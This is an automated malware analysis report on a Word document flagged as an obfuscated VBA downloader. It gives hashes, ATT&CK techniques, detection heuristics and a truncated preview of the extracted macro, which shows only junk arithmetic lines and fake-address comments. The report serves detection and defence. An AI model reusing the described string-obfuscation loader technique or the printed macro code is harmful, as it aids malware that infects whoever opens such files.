Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fce3cb5ebf184419…

MALICIOUS

Office (OLE)

281.5 KB Created: 2019-10-11 06:46:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: b83fe468d19320f6d43d1b41618c4c0c SHA-1: 68e21077c06e932019f62af115ddb525782dcfd9 SHA-256: fce3cb5ebf184419ddfb0eec24a4a0eefa9b581366ac8a6ba9faa8308979e401
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The presence of an AutoOpen macro and GetObject calls suggests an attempt to automatically execute malicious code upon opening. The ClamAV detection further confirms its malicious nature as a downloader. The VBA code appears to be heavily obfuscated with random-looking variable names and mathematical operations, likely to hinder analysis and disguise its true purpose of downloading and executing a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-7329510-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7329510-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83032 bytes
SHA-256: 034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "c0700907660"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b270861x0570"
Function cb123x4531b7()
On Error Resume Next
   'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru
c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233)
'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway
b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453)
'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island
x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862)
'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories
x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585)
'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam
x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626)
'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati
bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6)
'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea
c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902)
'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece
'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua
c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356)
'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau
b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426)
'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic
c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567)
'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso
b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430)
'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S)
c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388)
'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands
b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220)
'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia
c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398)
'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau
   'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands
c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54)
'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates
b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65)
'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau
bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543)
'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana
b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657)
'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse
... (truncated)